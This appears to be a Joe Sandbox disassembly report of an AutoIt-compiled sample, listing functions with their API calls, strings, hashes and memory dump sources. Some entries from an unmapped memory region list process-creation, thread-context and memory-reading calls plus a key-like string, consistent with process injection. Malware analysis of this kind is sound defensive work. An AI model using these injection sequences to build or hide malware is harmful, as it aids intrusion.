API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3828282dd9242d817345a819cb61bb97f69c4397790c1a2b8a11f9f0dd28b3f5
Instruction ID: b84f9748781fe76bd6c8270498c257ebdfbf32097a84df9d6cbb604236c71bc9
Opcode Fuzzy Hash: 3828282dd9242d817345a819cb61bb97f69c4397790c1a2b8a11f9f0dd28b3f5
Instruction Fuzzy Hash: B83138B1940309EFDB509FA4E884BCDBBF0FB09310F54453AE580E62A1E3B54596CF5A

Function 003A3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 003A3074
RegisterClassExW.USER32(00000030), ref: 003A309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003A30AF
InitCommonControlsEx.COMCTL32(?), ref: 003A30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003A30DC
LoadIconW.USER32(000000A9), ref: 003A30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003A3101

Strings

0, xrefs: 003A3056
TaskbarCreated, xrefs: 003A30A4
AutoIt v3 GUI, xrefs: 003A3090
+, xrefs: 003A305D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 37e7020c62bd1fb5822463a2b1cd65163f5ef2b76f46c9030f7649c16880cc17
Instruction ID: f32a0053724b03159d3e05870f2917f8542a6d7640759e7ed2b37ea2d29225ab
Opcode Fuzzy Hash: 37e7020c62bd1fb5822463a2b1cd65163f5ef2b76f46c9030f7649c16880cc17
Instruction Fuzzy Hash: 4421C7B1E11218AFDB10DFA4ED49B9DBBF4FB08700F90413AF510A72A0E7B545598F99

Function 003A708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003A4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004652F8,?,003A37AE,?), ref: 003A4724

Part of subcall function 003C050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003A7165), ref: 003C052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003A71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003DE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003DE909
RegCloseKey.ADVAPI32(?), ref: 003DE947
_wcscat.LIBCMT ref: 003DE9A0

Strings

Include, xrefs: 003DE8BF, 003DE900
\, xrefs: 003DE9C3
\Include\, xrefs: 003A7165
Software\AutoIt v3\AutoIt, xrefs: 003A719E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 6d55f39192f34a1d984f61a2fa737724b62d49d3d479e0da46306dbeda96c010
Instruction ID: 6d8216a1ff27324c3b09833a3ef50242f5090503bb5580539c149c56c6218a1a
Opcode Fuzzy Hash: 6d55f39192f34a1d984f61a2fa737724b62d49d3d479e0da46306dbeda96c010
Instruction Fuzzy Hash: 34717F725093019EC305EF65ECA195BBBE8FF85310F81453EF445CB2A0EBB19949CB9A

Function 003A3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 003A36D2
KillTimer.USER32(?,00000001), ref: 003A36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003A371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003A372A
CreatePopupMenu.USER32 ref: 003A373E
PostQuitMessage.USER32(00000000), ref: 003A374D

Strings

TaskbarCreated, xrefs: 003A3725
%C, xrefs: 003DD081, 003DD0CF

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%C
API String ID: 129472671-2817076508
Opcode ID: 585d7f58403733e24b4be620a718738753b0accfdddbde5356cde3b0ce5cde0e
Instruction ID: b021056e8ac5e5612a5f0d8c5f91fd422ed24eda419abfb4320689e6e0c4a482
Opcode Fuzzy Hash: 585d7f58403733e24b4be620a718738753b0accfdddbde5356cde3b0ce5cde0e
Instruction Fuzzy Hash: 96419BB2200505BBDB236F68EC4DB793768EB46300F90013AF502977B1EBB59E55972A

Function 003A3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 003A3A50
LoadCursorW.USER32(00000000,00007F00), ref: 003A3A5F
LoadIconW.USER32(00000063), ref: 003A3A76
LoadIconW.USER32(000000A4), ref: 003A3A88
LoadIconW.USER32(000000A2), ref: 003A3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003A3AC0
RegisterClassExW.USER32(?), ref: 003A3B16

Part of subcall function 003A3041: GetSysColorBrush.USER32(0000000F), ref: 003A3074
Part of subcall function 003A3041: RegisterClassExW.USER32(00000030), ref: 003A309E
Part of subcall function 003A3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003A30AF
Part of subcall function 003A3041: InitCommonControlsEx.COMCTL32(?), ref: 003A30CC
Part of subcall function 003A3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003A30DC
Part of subcall function 003A3041: LoadIconW.USER32(000000A9), ref: 003A30F2
Part of subcall function 003A3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003A3101

Strings

#, xrefs: 003A3AFB
AutoIt v3, xrefs: 003A3B05
0, xrefs: 003A3AF4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 58b39ac2bf9ca41cc4ce952e15a0db53c29464a2b17d5bc9ba91b65d8b93db76
Instruction ID: 7dd5f74a32da015731719b27235ab3418ea7512a44e09d62d09148d3f69da3a8
Opcode Fuzzy Hash: 58b39ac2bf9ca41cc4ce952e15a0db53c29464a2b17d5bc9ba91b65d8b93db76
Instruction Fuzzy Hash: F1214BB5E00304AFEB11DFA4EC59B9D7BB4FB08711F40017AF504AA2A1E7F556448F89

Function 003A3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

RF, xrefs: 003DD213
/AutoIt3OutputDebug, xrefs: 003A3892
/AutoIt3ExecuteLine, xrefs: 003A38A7
/AutoIt3ExecuteScript, xrefs: 003A38BC
CMDLINE, xrefs: 003A3822
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 003A37AE
/ErrorStdOut, xrefs: 003A387D
CMDLINERAW, xrefs: 003A37FB

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RF
API String ID: 1825951767-174316329
Opcode ID: 9cfc15b77402d8d8b79678fad8fab5e83f220d30a9218b2be2f346e4973e6574
Instruction ID: 4cd23d6d5655aaa7fc3064f31c20b1a0c764b482d5184ceb2a59f16178e52134
Opcode Fuzzy Hash: 9cfc15b77402d8d8b79678fad8fab5e83f220d30a9218b2be2f346e4973e6574
Instruction Fuzzy Hash: 9CA13D7291021DAACF06EBA4DC95EEEB779FF16300F44052AF416BB191EF745A08CB61

Function 003AF76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003C0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 003C0193
Part of subcall function 003C0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 003C019B
Part of subcall function 003C0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003C01A6
Part of subcall function 003C0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003C01B1
Part of subcall function 003C0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003C01B9
Part of subcall function 003C0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003C01C1

Part of subcall function 003B60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003AF930), ref: 003B6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003AF9CD
OleInitialize.OLE32(00000000), ref: 003AFA4A
CloseHandle.KERNEL32(00000000), ref: 003E45C8

Strings

SF, xrefs: 003AF7EB
%C, xrefs: 003AF796, 003AF7A8, 003AF96E, 003AFA51
<WF, xrefs: 003AF930
\TF, xrefs: 003AF7F7

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <WF$\TF$%C$SF
API String ID: 1986988660-3062275575
Opcode ID: 9d50839f3d00a0c0e3d15311eaa832a83cd4d1ad88c317a629361b2a3ff8c9ec
Instruction ID: e1ea78a89ed09ce4c4b25e43fdc92a44b7b43fa398b5648fe8cfa293d1e107fa
Opcode Fuzzy Hash: 9d50839f3d00a0c0e3d15311eaa832a83cd4d1ad88c317a629361b2a3ff8c9ec
Instruction Fuzzy Hash: 7B81CBB0901A408FC394EF29A9447587BE5EB48306F9081BAD409CB372FBF444848F1F

Function 0100F440 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0100F511
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0100F737

Memory Dump Source

Source File: 00000000.00000002.2056055672.000000000100C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0100C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100c000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction ID: 05e65f5dd6e82cc63d1b6f2a954fcb9e0e1ac748c0d7fdb2de8effacd68c3786
Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
Instruction Fuzzy Hash: E2A12A74E00209EBEB25CFA4C854BEEBBB5BF48305F208199E245BB2D0D7759A41DF54

Function 003A39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003A3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003A3A24
ShowWindow.USER32(00000000,?,?), ref: 003A3A38
ShowWindow.USER32(00000000,?,?), ref: 003A3A41

Strings

edit, xrefs: 003A3A1E
AutoIt v3, xrefs: 003A39FB, 003A3A00, 003A3A01

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a9f396a2835984179c4880a0d66a9c6bc6f5f7d8622953cab1f46fc5568e013b
Instruction ID: 7f25dec19d0dadffa29be55525c3ade4466d23c980508056065aa3daa70e9f09
Opcode Fuzzy Hash: a9f396a2835984179c4880a0d66a9c6bc6f5f7d8622953cab1f46fc5568e013b
Instruction Fuzzy Hash: 86F03A706002907EEA3057236C19E2B2E7DD7C6F50F40407AF900E2170D6A50841DEB9

Function 0100F230 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0100F120: Sleep.KERNELBASE(000001F4), ref: 0100F131

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0100F32D

Strings

057OPHLWPGML6IV4, xrefs: 0100F390, 0100F393

Memory Dump Source

Source File: 00000000.00000002.2056055672.000000000100C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0100C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100c000_n0nsAzvYNd.jbxd

Similarity

API ID: CreateFileSleep
String ID: 057OPHLWPGML6IV4
API String ID: 2694422964-3912358319
Opcode ID: 1d58a4e2bd560cf8b8bb8c37ae82032c58cb0944e035cd2632076c71177e4073
Instruction ID: f6448a7e67ceac5ad37e8a3b970a56c7a7c2d141129962d157d2a7c23a0b34fb
Opcode Fuzzy Hash: 1d58a4e2bd560cf8b8bb8c37ae82032c58cb0944e035cd2632076c71177e4073
Instruction Fuzzy Hash: C3516671D0424ADBEF21D7A4C844BEEBB79AF15314F004199E248BB1C0D7791B45DBA5

Function 003A407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003DD3D7

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

_memset.LIBCMT ref: 003A40FC
_wcscpy.LIBCMT ref: 003A4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003A4160

Strings

Line: , xrefs: 003DD400

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 522382586804e3ded3d62a8540e0e9a29e3e52d165a2b6dbb03433a52583adb7
Instruction ID: 5e2bc27bed5dbc0670a66eb72f8ff0a62fcc160b25a80b1dfe1c55ddc617e708
Opcode Fuzzy Hash: 522382586804e3ded3d62a8540e0e9a29e3e52d165a2b6dbb03433a52583adb7
Instruction Fuzzy Hash: 6D31AF71108304AAD322EB60DC46FDB77D8EB96310F10452EF58596091EBB49648CB97

Function 003C541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C547B
_memcpy_s.LIBCMT ref: 003C54ED
__read_nolock.LIBCMT ref: 003C554B
__filbuf.LIBCMT ref: 003C556E
_memset.LIBCMT ref: 003C55B2

Part of subcall function 003C8B28: __getptd_noexit.LIBCMT ref: 003C8B28

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 34cd29ff63029d6aab18660e16814819cdd63367f9d64d5517d72e1400e85a93
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 4351A671A00B059BCB2A9F69D840F6E77A6EF51321F25872DF826D62D0DB70BDD08B40

Function 003A686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 003A4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 003A4E0F

_free.LIBCMT ref: 003DE263
_free.LIBCMT ref: 003DE2AA

Part of subcall function 003A6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003A6BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 003DE039
Bad directive syntax error, xrefs: 003DE292

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: d2d025fff3ad1265042708de31c81434aaa4873189d27317fa97c3c79fdee222
Instruction ID: 1117f396360389debe19456c2b102a4ca2ec01adfb66ba93e9fd20e4263aec3f
Opcode Fuzzy Hash: d2d025fff3ad1265042708de31c81434aaa4873189d27317fa97c3c79fdee222
Instruction Fuzzy Hash: 48916E72A00219DFCF06EFA4DC819EDBBB8FF15314B14442AF815AF2A1DB74A905CB50

Function 003A35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003A35A1,SwapMouseButtons,00000004,?), ref: 003A35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003A35A1,SwapMouseButtons,00000004,?,?,?,?,003A2754), ref: 003A35F5
RegCloseKey.KERNELBASE(00000000,?,?,003A35A1,SwapMouseButtons,00000004,?,?,?,?,003A2754), ref: 003A3617

Strings

Control Panel\Mouse, xrefs: 003A35D2

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6a184a93ee127cef68eb43906db7d7a9c1765a1e977f1b24a2c5000f63e05597
Instruction ID: e5eb02230bba068ff23ef646ca4d3f8b5e4ec1e6011c78722b6f9f4a33db5731
Opcode Fuzzy Hash: 6a184a93ee127cef68eb43906db7d7a9c1765a1e977f1b24a2c5000f63e05597
Instruction Fuzzy Hash: 06115A71A14208BFDB218FA4DC80DAFB7BCEF05740F41446AF805D7220E6719F459B64

Function 0100E120 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0100E94D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0100E971
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0100E993

Memory Dump Source

Source File: 00000000.00000002.2056055672.000000000100C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0100C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100c000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction ID: cb14444312938d4773c6afe37d9ac3952d2f0f9cd07ffe937bec8d6a3252c7b7
Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
Instruction Fuzzy Hash: 68620A30A146589BEB24CBA4C850BDEB772EF58300F1095A9D24DEB3D0E7769E81CB59

Function 0040955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 003A4EE5: _fseek.LIBCMT ref: 003A4EFD

Part of subcall function 00409734: _wcscmp.LIBCMT ref: 00409824
Part of subcall function 00409734: _wcscmp.LIBCMT ref: 00409837

_free.LIBCMT ref: 004096A2
_free.LIBCMT ref: 004096A9
_free.LIBCMT ref: 00409714

Part of subcall function 003C2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,003C9A24), ref: 003C2D69
Part of subcall function 003C2D55: GetLastError.KERNEL32(00000000,?,003C9A24), ref: 003C2D7B

_free.LIBCMT ref: 0040971C

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 9638a6a1d5f40ba7e72ff0727c9ababd31b80e680cbba76a759a397ea1871214
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 1E5151B1D04218AFDF259F65CC85A9EBB79EF88300F1044AEF109A7241DB755E80CF58

Function 003C470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003C47A0
__flush.LIBCMT ref: 003C47C0
__write.LIBCMT ref: 003C47F3
__flsbuf.LIBCMT ref: 003C4821

Part of subcall function 003C8B28: __getptd_noexit.LIBCMT ref: 003C8B28

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
